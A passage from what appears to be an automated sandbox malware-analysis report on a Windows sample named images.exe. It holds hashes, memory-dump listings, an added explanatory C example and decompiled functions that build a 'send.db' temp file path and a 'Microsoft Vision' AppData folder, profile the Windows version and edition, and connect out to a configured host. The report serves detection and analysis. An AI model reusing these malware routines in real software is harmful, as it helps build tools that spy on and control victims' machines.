                                      • Associated: 00000003.00000002.578971084.00D85000.00000008.00020000.sdmp
                                      • Associated: 00000003.00000002.578988900.00D87000.00000004.00020000.sdmp
                                      • Associated: 00000003.00000002.579002903.00D89000.00000008.00020000.sdmp
                                      • Associated: 00000003.00000002.579026291.00D8D000.00000004.00020000.sdmp
                                      • Associated: 00000003.00000002.579044316.00D8E000.00000008.00020000.sdmp
                                      • Associated: 00000003.00000002.579062903.00D91000.00000004.00020000.sdmp
                                      • Associated: 00000003.00000002.579083023.00D93000.00000002.00020000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_cc0000_images.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: C:\ProgramData\images.exe
                                      • API String ID: 0-922034686
                                      • Opcode ID: 8d119e7b9cd8a656015095881c8660ad51bb9cd0e8d3dee76717ecc54d443f83
                                      • Instruction ID: 7a1ea7685bf1f23060a4978caa7ebd64af7ca901778254edea0504363b792e8d
                                      • Opcode Fuzzy Hash: 8d119e7b9cd8a656015095881c8660ad51bb9cd0e8d3dee76717ecc54d443f83
                                      • Instruction Fuzzy Hash: 24418271E04718ABCB29DF99DD95FAEBBB8EB89311B1040AEE514E7311D7708E40DB60
                                      Uniqueness

                                      Uniqueness Score: 100.00%

                                      C-Code - Quality: 83%
                                      			E00440FE0(void* __eax, void* __ebx, void* __ecx, void* __edx, intOrPtr _a5) {
                                      				char _v7;
                                      				signed int _v27;
                                      				char _v31;
                                      				short _v2079;
                                      				void* _t47;
                                      
                                      				_t42 = __edx;
                                      				 *((intOrPtr*)(__ebx + 0x46183c1)) =  *((intOrPtr*)(__ebx + 0x46183c1)) + __ecx;
                                      				_t47 = __ecx;
                                      				E00431052( &_v2079, 0, 0x400);
                                      				GetTempPathW(0x400,  &_v2079);
                                      				lstrcatW( &_v2079, L"send.db");
                                      				E00433264(_t47 + 4, E00433412( &_v7,  &_v2079));
                                      				E00435A2D(_v7);
                                      				_v27 = _v27 & 0x00000000;
                                      				asm("xorps xmm0, xmm0");
                                      				_v31 = 0x35;
                                      				asm("movups [ebp-0x14], xmm0");
                                      				E004334A6(E0043358E( &_v31, _t42, _t47 + 4), _v27, _a5);
                                      				E00433492( &_v31);
                                      				return _a5;
                                      			}

                                      APIs
                                      • GetTempPathW.KERNEL32(00000400,?), ref: 00441018
                                      • lstrcatW.KERNEL32(?,send.db), ref: 0044102A
                                        • Part of subcall function 00433412: lstrlenW.KERNEL32(0043FC61,00000000,?,0043FC61,00000000,?,00000000), ref: 0043341B
                                        • Part of subcall function 00433412: lstrlenW.KERNEL32(0043FC61,?,0043FC61,00000000,?,00000000), ref: 00433432
                                        • Part of subcall function 00433412: lstrcpyW.KERNEL32(?,0043FC61), ref: 0043344D
                                        • Part of subcall function 00433264: lstrcpyW.KERNEL32(00000000,00000000), ref: 00433289
                                        • Part of subcall function 00435A2D: VirtualFree.KERNELBASE(00000000,00000000,00008000,0043E2AE,?,?,?,?,?,00000000), ref: 00435A35
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.577692381.00431000.00000020.00000001.sdmp, Offset: 00430000, based on PE: true
                                      • Associated: 00000003.00000002.577686049.00430000.00000004.00000001.sdmp
                                      • Associated: 00000003.00000002.577710609.00442000.00000002.00000001.sdmp
                                      • Associated: 00000003.00000002.577718723.00446000.00000004.00000001.sdmp
                                      • Associated: 00000003.00000002.577725352.00448000.00000002.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_430000_images.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpylstrlen$FreePathTempVirtuallstrcat
                                      • String ID: 5$send.db
                                      • API String ID: 891666058-2022884741
                                      • Opcode ID: 2dee113d007dbc1e4a49ce1cd0fb5ba9ad33c9e87c345235aea067790780af68
                                      • Instruction ID: 89eb01e09c6f539abe0a19581004ebdd3fca9d60b054e4d46065695f10915587
                                      • Opcode Fuzzy Hash: 2dee113d007dbc1e4a49ce1cd0fb5ba9ad33c9e87c345235aea067790780af68
                                      • Instruction Fuzzy Hash: D811C271D4011CABCB10EB61CC46BEE77BCAF59319F00C07AB505A2092EB789B46CBD4
                                      Uniqueness

                                      Uniqueness Score: 5.06%

                                      C-Code - Quality: 84%
                                      			E00440FEC(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4) {
                                      				char _v8;
                                      				signed int _v28;
                                      				char _v32;
                                      				short _v2080;
                                      				void* _t35;
                                      				void* _t37;
                                      
                                      				_t35 = __edx;
                                      				_t37 = __ecx;
                                      				E00431052( &_v2080, 0, 0x400);
                                      				GetTempPathW(0x400,  &_v2080);
                                      				lstrcatW( &_v2080, L"send.db");
                                      				_t38 = _t37 + 4;
                                      				E00433264(_t37 + 4, E00433412( &_v8,  &_v2080));
                                      				E00435A2D(_v8);
                                      				_t8 =  &_v28;
                                      				_v28 = _v28 & 0x00000000;
                                      				asm("xorps xmm0, xmm0");
                                      				_v32 = 0x35;
                                      				asm("movups [ebp-0x14], xmm0");
                                      				E004334A6(E0043358E( &_v32, _t35, _t38),  *_t8, _a4);
                                      				E00433492( &_v32);
                                      				return _a4;
                                      			}

                                      APIs
                                      • GetTempPathW.KERNEL32(00000400,?), ref: 00441018
                                      • lstrcatW.KERNEL32(?,send.db), ref: 0044102A
                                        • Part of subcall function 00433412: lstrlenW.KERNEL32(0043FC61,00000000,?,0043FC61,00000000,?,00000000), ref: 0043341B
                                        • Part of subcall function 00433412: lstrlenW.KERNEL32(0043FC61,?,0043FC61,00000000,?,00000000), ref: 00433432
                                        • Part of subcall function 00433412: lstrcpyW.KERNEL32(?,0043FC61), ref: 0043344D
                                        • Part of subcall function 00433264: lstrcpyW.KERNEL32(00000000,00000000), ref: 00433289
                                        • Part of subcall function 00435A2D: VirtualFree.KERNELBASE(00000000,00000000,00008000,0043E2AE,?,?,?,?,?,00000000), ref: 00435A35
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.577692381.00431000.00000020.00000001.sdmp, Offset: 00430000, based on PE: true
• Associated: 00000003.00000002.577686049.00430000.00000004.00000001.sdmp
• Associated: 00000003.00000002.577710609.00442000.00000002.00000001.sdmp
• Associated: 00000003.00000002.577718723.00446000.00000004.00000001.sdmp
• Associated: 00000003.00000002.577725352.00448000.00000002.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_430000_images.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpylstrlen$FreePathTempVirtuallstrcat
                                      • String ID: 5$send.db
                                      • API String ID: 891666058-2022884741
                                      • Opcode ID: d69e278e4eae55cae894796c14fea3a543b7c1ccbe61010c7385230e89fb903c
                                      • Instruction ID: a465b06a04a7b2a6dd2c024a2e9cb0a8a7c0e7c7191f66f5b9103bb802d70c3f
                                      • Opcode Fuzzy Hash: d69e278e4eae55cae894796c14fea3a543b7c1ccbe61010c7385230e89fb903c
                                      • Instruction Fuzzy Hash: C4015E71D0011DABDB10EB65DC46BEEB7BCAF59319F00C07AB505A2091EB789B46CB94
                                      Uniqueness

                                      Uniqueness Score: 5.06%

                                      C-Code - Quality: 66%
                                      			E004413C8(void* __ecx, void* __edx, intOrPtr _a4) {
                                      				char _v8;
                                      				char _v28;
                                      				char _v32;
                                      				short _v552;
                                      				void* _t34;
                                      
                                      				_t34 = __edx;
                                      				_v8 = 0;
				E00431052( &_v552, 0, 0x208); // zero 0x208 bytes = a 260-WCHAR (MAX_PATH) path buffer
				__imp__SHGetFolderPathW(0, 0x1c, 0, 0,  &_v552); // CSIDL 0x1c = CSIDL_LOCAL_APPDATA
				lstrcatW( &_v552, L"\\Microsoft Vision\\"); // lstrcatW takes no length; appends onto the MAX_PATH buffer
                                      				E00433297( &_v8, _t34, 0,  &_v552);
                                      				_v32 = 0x3b;
                                      				asm("xorps xmm0, xmm0");
                                      				_v28 = 0;
                                      				asm("movups [ebp-0x14], xmm0");
                                      				E004334A6(E0043358E( &_v32, _t34,  &_v8), 0, _a4);
                                      				E00433492( &_v32);
                                      				E00435A2D(_v8);
                                      				return _a4;
                                      			}

                                      0x004413c8
                                      0x004413e1
                                      0x004413e4
                                      0x004413f8
                                      0x0044140a
                                      0x0044141a
                                      0x00441425
                                      0x0044142c
                                      0x0044142f
                                      0x00441436
                                      0x00441441
                                      0x00441449
                                      0x00441451
                                      0x0044145b

                                      APIs
                                      • SHGetFolderPathW.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 004413F8
                                      • lstrcatW.KERNEL32(?,\Microsoft Vision\), ref: 0044140A
                                        • Part of subcall function 00435A2D: VirtualFree.KERNELBASE(00000000,00000000,00008000,0043E2AE,?,?,?,?,?,00000000), ref: 00435A35
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.577692381.00431000.00000020.00000001.sdmp, Offset: 00430000, based on PE: true
• Associated: 00000003.00000002.577686049.00430000.00000004.00000001.sdmp
• Associated: 00000003.00000002.577710609.00442000.00000002.00000001.sdmp
• Associated: 00000003.00000002.577718723.00446000.00000004.00000001.sdmp
• Associated: 00000003.00000002.577725352.00448000.00000002.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_430000_images.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: FolderFreePathVirtuallstrcat
                                      • String ID: ;$\Microsoft Vision\
                                      • API String ID: 1529938272-253167065
                                      • Opcode ID: 80de5e38522ab86676474ed0b9dd8d51d73c11c07ae529424c69f0adc6d1ef85
                                      • Instruction ID: 2b8ce50dd8466d574f366dfbae1ec29780b3a7cb6f45f27ee4e5ced465d8f0e9
                                      • Opcode Fuzzy Hash: 80de5e38522ab86676474ed0b9dd8d51d73c11c07ae529424c69f0adc6d1ef85
                                      • Instruction Fuzzy Hash: 95012171D0011DBACB10EFA1ED49DDFBBB8AF19308F10415AB505A2091EB78AB45CBD4
                                      Uniqueness

                                      Uniqueness Score: 6.84%

                                      C-Code - Quality: 58%
                                      			E0043D469() {
                                      				intOrPtr _v6;
                                      				char _v288;
                                      				struct HINSTANCE__* _t4;
                                      				intOrPtr _t5;
                                      				_Unknown_base(*)()* _t9;
                                      
				_v288 = 0x11c; // dwOSVersionInfoSize = sizeof(RTL_OSVERSIONINFOEXW), 284 bytes
				_t4 = LoadLibraryA("ntdll.dll");
				if(_t4 == 0) {
					L3:
					_t5 = _v6; // struct offset 288-6 = 282: wProductType
					if(_t5 == 2 || _t5 == 3) { // VER_NT_DOMAIN_CONTROLLER or VER_NT_SERVER
                                      						return 1;
                                      					} else {
                                      						goto L5;
                                      					}
                                      				} else {
                                      					_t9 = GetProcAddress(_t4, "RtlGetVersion");
                                      					if(_t9 == 0) {
                                      						L5:
                                      						return 0;
                                      					} else {
                                      						 *_t9( &_v288);
                                      						goto L3;
                                      					}
                                      				}
                                      			}

                                      0x0043d477
                                      0x0043d481
                                      0x0043d489
                                      0x0043d4a4
                                      0x0043d4a4
                                      0x0043d4a9
                                      0x0043d4b7
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x0043d48b
                                      0x0043d491
                                      0x0043d499
                                      0x0043d4af
                                      0x0043d4b2
                                      0x0043d49b
                                      0x0043d4a2
                                      0x00000000
                                      0x0043d4a2
                                      0x0043d499

                                      APIs
                                      • LoadLibraryA.KERNEL32(ntdll.dll), ref: 0043D481
                                      • GetProcAddress.KERNEL32(00000000,RtlGetVersion), ref: 0043D491
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.577692381.00431000.00000020.00000001.sdmp, Offset: 00430000, based on PE: true
• Associated: 00000003.00000002.577686049.00430000.00000004.00000001.sdmp
• Associated: 00000003.00000002.577710609.00442000.00000002.00000001.sdmp
• Associated: 00000003.00000002.577718723.00446000.00000004.00000001.sdmp
• Associated: 00000003.00000002.577725352.00448000.00000002.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_430000_images.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AddressLibraryLoadProc
                                      • String ID: RtlGetVersion$ntdll.dll
                                      • API String ID: 2574300362-1489217083
                                      • Opcode ID: 9ef56fb0e0f5b73b35aafe0bd873d3effc046a983d631c6bdd3b4e3cda23049c
                                      • Instruction ID: 35e11eb3bd4c0c77c70e3f6ccdae3cce2d16abe06e2b311f24c821c253e48928
                                      • Opcode Fuzzy Hash: 9ef56fb0e0f5b73b35aafe0bd873d3effc046a983d631c6bdd3b4e3cda23049c
                                      • Instruction Fuzzy Hash: 1DE0D834E8020816DB296F75AD0B7D73BA85F96744F4800A5A686E01C1EAFCD902CADC
                                      Uniqueness

                                      Uniqueness Score: 100.00%

                                      C-Code - Quality: 58%
                                      			E0043D4B8() {
                                      				intOrPtr _v272;
                                      				intOrPtr _v284;
                                      				char _v288;
                                      				struct HINSTANCE__* _t5;
                                      				_Unknown_base(*)()* _t8;
                                      
				_v288 = 0x11c; // dwOSVersionInfoSize = sizeof(RTL_OSVERSIONINFOEXW), 284 bytes
				_t5 = LoadLibraryA("ntdll.dll");
				if(_t5 == 0) {
					L3:
					if(_v272 != 2) { // struct offset 288-272 = 16: dwPlatformId != VER_PLATFORM_WIN32_NT
						goto L5;
					} else {
						return _v284; // struct offset 288-284 = 4: dwMajorVersion
                                      					}
                                      				} else {
                                      					_t8 = GetProcAddress(_t5, "RtlGetVersion");
                                      					if(_t8 == 0) {
                                      						L5:
                                      						return 0;
                                      					} else {
                                      						 *_t8( &_v288);
                                      						goto L3;
                                      					}
                                      				}
                                      			}

                                      0x0043d4c6
                                      0x0043d4d0
                                      0x0043d4d8
                                      0x0043d4f3
                                      0x0043d4fa
                                      0x00000000
                                      0x0043d4fc
                                      0x0043d503
                                      0x0043d503
                                      0x0043d4da
                                      0x0043d4e0
                                      0x0043d4e8
                                      0x0043d504
                                      0x0043d507
                                      0x0043d4ea
                                      0x0043d4f1
                                      0x00000000
                                      0x0043d4f1
                                      0x0043d4e8

                                      APIs
                                      • LoadLibraryA.KERNEL32(ntdll.dll), ref: 0043D4D0
                                      • GetProcAddress.KERNEL32(00000000,RtlGetVersion), ref: 0043D4E0
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.577692381.00431000.00000020.00000001.sdmp, Offset: 00430000, based on PE: true
• Associated: 00000003.00000002.577686049.00430000.00000004.00000001.sdmp
• Associated: 00000003.00000002.577710609.00442000.00000002.00000001.sdmp
• Associated: 00000003.00000002.577718723.00446000.00000004.00000001.sdmp
• Associated: 00000003.00000002.577725352.00448000.00000002.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_430000_images.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AddressLibraryLoadProc
                                      • String ID: RtlGetVersion$ntdll.dll
                                      • API String ID: 2574300362-1489217083
                                      • Opcode ID: f32fb965185e7025c02a9de066ce7fde7b36a51aff03085d573f389cae49a2e6
                                      • Instruction ID: 933c0b119ab962c4f2ad9add3893660bb9fd45714bdd6e36b671144c4c9ac32a
                                      • Opcode Fuzzy Hash: f32fb965185e7025c02a9de066ce7fde7b36a51aff03085d573f389cae49a2e6
                                      • Instruction Fuzzy Hash: EDE09A30A402095ADB28AF71AC0BBC73BB86B42748F0444E4A605E1180EAB8DA84CED8
                                      Uniqueness

                                      Uniqueness Score: 100.00%
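The two RtlGetVersion wrappers above (E0043D469 and E0043D4B8) read more easily once the decompiler's stack locals are mapped back onto the 0x11C-byte structure they index. The C below is an added example written for this report, not code recovered from the sample: it lays out RTL_OSVERSIONINFOEXW with portable types, checks that `_v284`, `_v272` and `_v6` land on dwMajorVersion, dwPlatformId and wProductType when the structure sits at EBP-288, and reimplements the two decisions (server-edition check, NT major version) over a constructed record. The field values for the Windows 7 analysis VM and the VER_* constants are assumptions stated in the comments; no Windows API is called, so it compiles on any host.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Portable copy of the RTL_OSVERSIONINFOEXW layout (WCHAR modelled as uint16_t).
 * Natural alignment yields the same 284 (0x11C) byte size and offsets as on Windows. */
typedef struct {
    uint32_t dwOSVersionInfoSize;
    uint32_t dwMajorVersion;
    uint32_t dwMinorVersion;
    uint32_t dwBuildNumber;
    uint32_t dwPlatformId;
    uint16_t szCSDVersion[128];
    uint16_t wServicePackMajor;
    uint16_t wServicePackMinor;
    uint16_t wSuiteMask;
    uint8_t  wProductType;
    uint8_t  wReserved;
} osversioninfoexw_t;

#define OSVI_EX_SIZE            0x11Cu /* value both functions store in _v288 */
#define STRUCT_BASE_BELOW_EBP   288    /* the decompiler placed the struct at EBP-288 (_v288) */
#define PLATFORM_WIN32_NT       2      /* dwPlatformId on every NT-based Windows (assumed constant) */
#define NT_WORKSTATION          1      /* wProductType values (assumed constants) */
#define NT_DOMAIN_CONTROLLER    2
#define NT_SERVER               3

/* "_vN" in the decompiler output means EBP-N; with the struct at EBP-288 the field offset is 288-N. */
static size_t local_to_offset(unsigned ebp_distance) {
    return (size_t)(STRUCT_BASE_BELOW_EBP - ebp_distance);
}

/* 1 when _v284, _v272 and _v6 resolve to dwMajorVersion, dwPlatformId and wProductType. */
static int local_names_match_layout(void) {
    return sizeof(osversioninfoexw_t) == OSVI_EX_SIZE
        && local_to_offset(284) == offsetof(osversioninfoexw_t, dwMajorVersion)
        && local_to_offset(272) == offsetof(osversioninfoexw_t, dwPlatformId)
        && local_to_offset(6)   == offsetof(osversioninfoexw_t, wProductType);
}

/* Same decision as E0043D469: 1 on a domain controller or server SKU, 0 otherwise. */
static int e0043d469_is_server(const osversioninfoexw_t *o) {
    return (o->wProductType == NT_DOMAIN_CONTROLLER || o->wProductType == NT_SERVER) ? 1 : 0;
}

/* Same decision as E0043D4B8: dwMajorVersion when dwPlatformId is WIN32_NT, else 0. */
static uint32_t e0043d4b8_major_version(const osversioninfoexw_t *o) {
    return o->dwPlatformId == PLATFORM_WIN32_NT ? o->dwMajorVersion : 0;
}

/* Constructed record approximating the Windows 7 SP1 analysis VM (6.1 build 7601);
 * platform_id and product_type are parameters so both branches can be exercised. */
static osversioninfoexw_t make_sample(uint32_t platform_id, uint8_t product_type) {
    osversioninfoexw_t o;
    memset(&o, 0, sizeof o);
    o.dwOSVersionInfoSize = OSVI_EX_SIZE;
    o.dwMajorVersion = 6;
    o.dwMinorVersion = 1;
    o.dwBuildNumber = 7601;
    o.dwPlatformId = platform_id;
    o.wProductType = product_type;
    return o;
}

/* E0043D469 evaluated on the constructed record with the given wProductType. */
static int sample_is_server(uint8_t product_type) {
    osversioninfoexw_t o = make_sample(PLATFORM_WIN32_NT, product_type);
    return e0043d469_is_server(&o);
}

/* E0043D4B8 evaluated on the constructed record with the given dwPlatformId. */
static uint32_t sample_major_version(uint32_t platform_id) {
    osversioninfoexw_t o = make_sample(platform_id, NT_WORKSTATION);
    return e0043d4b8_major_version(&o);
}

int main(void) {
    printf("layout matches decompiler locals: %d\n", local_names_match_layout());
    printf("E0043D469 on workstation/server: %d/%d\n",
           sample_is_server(NT_WORKSTATION), sample_is_server(NT_SERVER));
    printf("E0043D4B8 major version: %u\n", sample_major_version(PLATFORM_WIN32_NT));
    return 0;
}
```

The offset check is the useful part when triaging other samples from the same family: a local named `_vN` adjacent to a `0x11c` store is a field of OSVERSIONINFOEXW at offset `288-N` only if the buffer base really is `_v288`; re-derive the base from the decompiler's declaration before trusting the field name.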

                                      C-Code - Quality: 86%
                                      			E0043B66A() {
                                      				intOrPtr _t4;
                                      				void* _t5;
                                      				int _t9;
                                      				void* _t16;
                                      				void* _t17;
                                      
                                      				DeleteCriticalSection(0x447bf8);
                                      				_t4 =  *0x447bec; // 0x0
                                      				if(_t4 != 0) {
                                      					__eax = CloseHandle(__eax);
                                      				}
                                      				_t5 =  *0x447be4; // 0x0
                                      				if(_t5 != 0) {
                                      					CloseHandle(_t5);
                                      				}
                                      				L1();
				__imp__#116(_t17); // WS2_32 ordinal 116 = WSACleanup
                                      				E0043E221(0x4479fc);
                                      				E00432E66(0x447854);
                                      				E00432E66(0x447834);
                                      				_t16 =  *0x447824;
				_t9 = VirtualFree(_t16, 0, 0x8000); // 0x8000 = MEM_RELEASE; executed
                                      				return _t9;
                                      			}

                                      0x0043b66f
                                      0x0043b675
                                      0x0043b67c
                                      0x0043b67f
                                      0x0043b67f
                                      0x0043b685
                                      0x0043b68c
                                      0x0043b68f
                                      0x0043b68f
                                      0x0043b69a
                                      0x00435110
                                      0x0043511c
                                      0x00435124
                                      0x0043512c
                                      0x00435131
                                      0x00435a35
                                      0x00435a3b

                                      APIs
                                      • DeleteCriticalSection.KERNEL32(00447BF8), ref: 0043B66F
                                      • CloseHandle.KERNEL32(00000000), ref: 0043B67F
                                      • CloseHandle.KERNEL32(00000000), ref: 0043B68F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.577692381.00431000.00000020.00000001.sdmp, Offset: 00430000, based on PE: true
• Associated: 00000003.00000002.577686049.00430000.00000004.00000001.sdmp
• Associated: 00000003.00000002.577710609.00442000.00000002.00000001.sdmp
• Associated: 00000003.00000002.577718723.00446000.00000004.00000001.sdmp
• Associated: 00000003.00000002.577725352.00448000.00000002.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_430000_images.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseHandle$CriticalDeleteSection
                                      • String ID: $xD
                                      • API String ID: 2166061224-1448231257
                                      • Opcode ID: 8ada1ad76b2d4c47cf7a6cc92707faff30cb12cad9a83d80752a4dfb1d545951
                                      • Instruction ID: 47b27e4ade2d7f3ee9bb8a0cca9e8c5947123012384e4dbb89d928222a8dc695
                                      • Opcode Fuzzy Hash: 8ada1ad76b2d4c47cf7a6cc92707faff30cb12cad9a83d80752a4dfb1d545951
                                      • Instruction Fuzzy Hash: EAD05E387083408BFB006F719D1D7163298FB4A7497011077B616C73A1EBACD9028AAE
                                      Uniqueness

                                      Uniqueness Score: 100.00%

                                      C-Code - Quality: 94%
                                      			E0043B4FE(signed int* __ecx, intOrPtr _a4) {
                                      				signed int _v8;
                                      				signed int _v12;
                                      				void* _t22;
                                      				void* _t23;
                                      				void* _t33;
                                      				struct _CRITICAL_SECTION* _t43;
                                      				signed int* _t59;
                                      				intOrPtr _t62;
                                      				void* _t66;
                                      
                                      				_t45 = __ecx;
                                      				_push(__ecx);
                                      				_push(__ecx);
                                      				_t59 = __ecx;
                                      				_t43 = __ecx + 0x3d8;
                                      				EnterCriticalSection(_t43);
                                      				_t67 = _t59[0x7b];
                                      				_t62 = _a4;
                                      				if(_t59[0x7b] != 0) {
                                      					L2:
                                      					_t69 = _t59[3];
                                      					if(_t59[3] != 0) {
                                      						L5:
                                      						_t63 =  &(_t59[0xf1]);
                                      						_t22 = E004320B4( &(_t59[0xf1]), 0);
                                      						__eflags = _t22;
                                      						if(_t22 == 0) {
                                      							E00431E9A(_t63);
                                      						}
                                      						_t23 = E004320B4( &(_t59[0xf3]), 0);
                                      						__eflags = _t23;
                                      						if(_t23 == 0) {
                                      							E00431E9A( &(_t59[0xf3]));
                                      						}
                                      						_v12 = _t59[4];
                                      						_v8 = _t59[0x7c];
                                      						E00431E6F(_t63, E0043B424,  &_v12);
                                      						E00431E6F( &(_t59[0xf3]), E0043B491,  &_v12);
                                      						 *_t59 = 1;
                                      						LeaveCriticalSection(_t43);
                                      						E004320B4( &(_t59[0xf1]), 0xffffffff);
                                      						E004320B4( &(_t59[0xf3]), 0xffffffff);
                                      						EnterCriticalSection(_t43);
                                      						 *_t59 =  *_t59 & 0x00000000;
                                      						LeaveCriticalSection(_t43);
                                      						E0043B6A9(_t59);
                                      						_t33 = 0;
                                      						__eflags = 0;
                                      					} else {
						E00433222(_t66, _t62); // lstrcpyA of the host string at _a4+0
						if(E0043538F( &(_t59[1]), _t69, _t45,  *((intOrPtr*)(_t62 + 4))) != 0) { // getaddrinfo/socket/htons/connect with the value at _a4+4
                                      							goto L5;
                                      						} else {
                                      							goto L4;
                                      						}
                                      					}
                                      				} else {
					E00433222(_t66, _t62 + 8); // lstrcpyA of the host string at _a4+8
					if(E0043538F( &(_t59[0x79]), _t67,  &(_t59[0x79]),  *((intOrPtr*)(_t62 + 0xc))) == 0) { // getaddrinfo/socket/htons/connect with the value at _a4+0xc
                                      						L4:
                                      						LeaveCriticalSection(_t43);
                                      						_t33 = 1;
                                      					} else {
                                      						goto L2;
                                      					}
                                      				}
                                      				return _t33;
                                      			}

                                      0x0043b4fe
                                      0x0043b501
                                      0x0043b502
                                      0x0043b506
                                      0x0043b508
                                      0x0043b50f
                                      0x0043b515
                                      0x0043b51c
                                      0x0043b51f
                                      0x0043b53f
                                      0x0043b53f
                                      0x0043b543
                                      0x0043b56c
                                      0x0043b56c
                                      0x0043b576
                                      0x0043b57b
                                      0x0043b57d
                                      0x0043b581
                                      0x0043b581
                                      0x0043b58e
                                      0x0043b593
                                      0x0043b595
                                      0x0043b59d
                                      0x0043b59d
                                      0x0043b5a7
                                      0x0043b5b0
                                      0x0043b5bc
                                      0x0043b5d0
                                      0x0043b5dc
                                      0x0043b5e2
                                      0x0043b5ec
                                      0x0043b5f9
                                      0x0043b5ff
                                      0x0043b605
                                      0x0043b609
                                      0x0043b60d
                                      0x0043b612
                                      0x0043b612
                                      0x0043b545
                                      0x0043b54c
                                      0x0043b55b
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x0043b55b
                                      0x0043b521
                                      0x0043b52b
                                      0x0043b53d
                                      0x0043b55d
                                      0x0043b55e
                                      0x0043b566
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x0043b53d
                                      0x0043b618

                                      APIs
                                      • EnterCriticalSection.KERNEL32(?), ref: 0043B50F
                                      • LeaveCriticalSection.KERNEL32(?,?,?,?), ref: 0043B55E
                                        • Part of subcall function 00433222: lstrcpyA.KERNEL32(00000000,?,?,00000000,?,00432939,?,?,00000000,exit,00000000,start), ref: 00433247
                                        • Part of subcall function 0043538F: getaddrinfo.WS2_32(?,00000000,00434AC8,00000000), ref: 004353DC
                                        • Part of subcall function 0043538F: socket.WS2_32(00000002,00000001,00000000), ref: 004353F3
                                        • Part of subcall function 0043538F: htons.WS2_32(?), ref: 00435419
                                        • Part of subcall function 0043538F: freeaddrinfo.WS2_32(00000000), ref: 00435429
                                        • Part of subcall function 0043538F: connect.WS2_32(?,?,00000010), ref: 00435435
                                      • LeaveCriticalSection.KERNEL32(?), ref: 0043B5E2
                                      • EnterCriticalSection.KERNEL32(?), ref: 0043B5FF
                                      • LeaveCriticalSection.KERNEL32(?), ref: 0043B609
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.577692381.00431000.00000020.00000001.sdmp, Offset: 00430000, based on PE: true
• Associated: 00000003.00000002.577686049.00430000.00000004.00000001.sdmp
• Associated: 00000003.00000002.577710609.00442000.00000002.00000001.sdmp
• Associated: 00000003.00000002.577718723.00446000.00000004.00000001.sdmp
• Associated: 00000003.00000002.577725352.00448000.00000002.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_430000_images.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CriticalSection$Leave$Enter$connectfreeaddrinfogetaddrinfohtonslstrcpysocket
                                      • String ID:
                                      • API String ID: 4195813003-0
                                      • Opcode ID: bafd075f3bfb7f181c4af04de6456884a8994448d01703dfcde1aed47cdecbc3
                                      • Instruction ID: 4c7cfb3ae0d0cbd2f9a4928935c56e1e138286165cacb5c3eadcd0bb8d7513a0
                                      • Opcode Fuzzy Hash: bafd075f3bfb7f181c4af04de6456884a8994448d01703dfcde1aed47cdecbc3
                                      • Instruction Fuzzy Hash: B131DB712006017BD718EB61CC52FAEB7ACFF08358F40651AF616D2191EB78AA14CBD8
                                      Uniqueness

                                      Uniqueness Score: 0.14%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.578723047.00CC1000.00000020.00020000.sdmp, Offset: 00CC0000, based on PE: true
• Associated: 00000003.00000002.578708562.00CC0000.00000002.00020000.sdmp
• Associated: 00000003.00000002.578805483.00CE2000.00000002.00020000.sdmp
• Associated: 00000003.00000002.578834966.00CEB000.00000004.00020000.sdmp
• Associated: 00000003.00000002.578847102.00CEC000.00000008.00020000.sdmp
• Associated: 00000003.00000002.578856272.00CED000.00000004.00020000.sdmp
• Associated: 00000003.00000002.578871909.00CEF000.00000008.00020000.sdmp
• Associated: 00000003.00000002.578928306.00D80000.00000004.00020000.sdmp
• Associated: 00000003.00000002.578946601.00D81000.00000008.00020000.sdmp
• Associated: 00000003.00000002.578962758.00D84000.00000004.00020000.sdmp
• Associated: 00000003.00000002.578971084.00D85000.00000008.00020000.sdmp
• Associated: 00000003.00000002.578988900.00D87000.00000004.00020000.sdmp
• Associated: 00000003.00000002.579002903.00D89000.00000008.00020000.sdmp
• Associated: 00000003.00000002.579026291.00D8D000.00000004.00020000.sdmp
• Associated: 00000003.00000002.579044316.00D8E000.00000008.00020000.sdmp
• Associated: 00000003.00000002.579062903.00D91000.00000004.00020000.sdmp
• Associated: 00000003.00000002.579083023.00D93000.00000002.00020000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_cc0000_images.jbxd
                                      Similarity
                                      • API ID: _strrchr
                                      • String ID:
                                      • API String ID: 3213747228-0
                                      • Opcode ID: dcdefaa96ecba3e08e07ee987e1db02f789c16f60a938597036e37ff1907a7f4
                                      • Instruction ID: 9be59ee06025231af4036994c723fce5bd68af7704dae20c77cd67172a65a256
                                      • Opcode Fuzzy Hash: dcdefaa96ecba3e08e07ee987e1db02f789c16f60a938597036e37ff1907a7f4
